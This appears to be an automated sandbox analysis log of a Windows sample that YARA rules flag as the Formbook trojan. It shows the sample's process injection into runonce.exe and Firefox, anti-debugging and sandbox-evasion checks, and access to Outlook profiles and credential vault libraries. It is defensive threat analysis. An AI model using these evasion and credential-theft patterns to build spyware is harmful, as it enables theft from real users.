        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EA5B5_2_0514EA5B
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05132AC05_2_05132AC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051475C65_2_051475C6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F5C95_2_0514F5C9
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051254905_2_05125490
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050FD4805_2_050FD480
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051316235_2_05131623
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512D62C5_2_0512D62C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0513D6465_2_0513D646
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F6F65_2_0514F6F6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051036EC5_2_051036EC
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0507F1135_2_0507F113
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512D1305_2_0512D130
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D717A5_2_050D717A
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050951C05_2_050951C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AB1E05_2_050AB1E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C508C5_2_050C508C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509B0D05_2_0509B0D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051470F15_2_051470F1
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F3305_2_0514F330
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050813805_2_05081380
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514124C5_2_0514124C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0507D2EC5_2_0507D2EC
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FD275_2_0514FD27
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05147D4C5_2_05147D4C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05099DD05_2_05099DD0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512FDF45_2_0512FDF4
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05093C605_2_05093C60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05129C985_2_05129C98
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AFCE05_2_050AFCE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05117CE85_2_05117CE8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0510FF405_2_0510FF40
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FF635_2_0514FF63
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05133FA05_2_05133FA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05141FC65_2_05141FC6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05091EB25_2_05091EB2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05149ED25_2_05149ED2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D59C05_2_050D59C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050599E85_2_050599E8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050938005_2_05093800
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051058705_2_05105870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F8725_2_0514F872
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050998705_2_05099870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AB8705_2_050AB870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051098B25_2_051098B2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051418DA5_2_051418DA
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051478F35_2_051478F3
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050CDB195_2_050CDB19
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FB2E5_2_0514FB2E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05121B805_2_05121B80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FA895_2_0514FA89
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AFAA05_2_050AFAA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031015405_2_03101540
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0311A0405_2_0311A040
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC7395_2_030FC739
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC7405_2_030FC740
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC9605_2_030FC960
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FA9E05_2_030FA9E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310309C5_2_0310309C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031030A05_2_031030A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 3777EF10 appears 73 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 376EB910 appears 162 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 37747BE4 appears 66 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 3776E692 appears 75 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050FE692 appears 86 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0510EF10 appears 105 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0507B910 appears 280 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050D7BE4 appears 100 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050C5050 appears 58 times
        Source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNONCE.EXEj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exe, 00000003.00000003.2923360317.0000000037642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exe, 00000003.00000002.3044601272.0000000037990000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/22@30/13
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040442A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Lumbagoen.lnkJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Temp\nss2B7C.tmpJump to behavior
        Source: ulACwpUCSU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ulACwpUCSU.exeReversingLabs: Detection: 65%
        Source: ulACwpUCSU.exeVirustotal: Detection: 35%
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile read: C:\Users\user\Desktop\ulACwpUCSU.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
        Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"Jump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Lumbagoen.lnk.0.drLNK file: ..\..\..\..\Windows\system32\scups\deployerende.emb
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: ulACwpUCSU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdbGCTL source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp, runonce.exe
        Source: Binary string: mshtml.pdbUGP source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdb source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.2885919945.0000000005AF5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406061
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050521AD pushad ; retf 0004h5_2_0505223F
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050808CD push ecx; mov dword ptr [esp], ecx5_2_050808D6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050597A1 push es; iretd 5_2_050597A8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0311029B push edi; retf 5_2_031102A8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031101B5 push esi; ret 5_2_031101B6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031047E8 push ebp; ret 5_2_031047E9
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03104877 pushfd ; iretd 5_2_03104878
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F4DED pushad ; iretd 5_2_030F4DF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310AC5E pushad ; ret 5_2_0310AC6D
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310ACEF push cs; iretd 5_2_0310ACF4
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03105229 push es; retf DC53h5_2_03105242
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F518D push ds; ret 5_2_030F518E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FD010 push esi; iretd 5_2_030FD0FD
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F3E88 push cs; ret 5_2_030F3E89
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 rdtsc 3_2_37731763
        Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9094Jump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 2.7 %
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep count: 9094 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep time: -18188000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -95000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -67500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -53000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 0_2_0040603A FindFirstFileA,FindClose, 0_2_0040603A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055F6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 0_2_00402645 FindFirstFileA, 0_2_00402645
        Source: C:\Windows\SysWOW64\runonce.exe Code function: 5_2_0310BA90 FindFirstFileW,FindNextFileW,FindClose, 5_2_0310BA90
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe API call chain: ExitProcess graph end node graph_0-4300
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe API call chain: ExitProcess graph end node graph_0-4306
        Source: C:\Windows\SysWOW64\runonce.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\runonce.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 3_2_37731763 rdtsc 3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 3_2_377334E0 NtCreateMutant,LdrInitializeThunk, 3_2_377334E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe Code function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406061
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
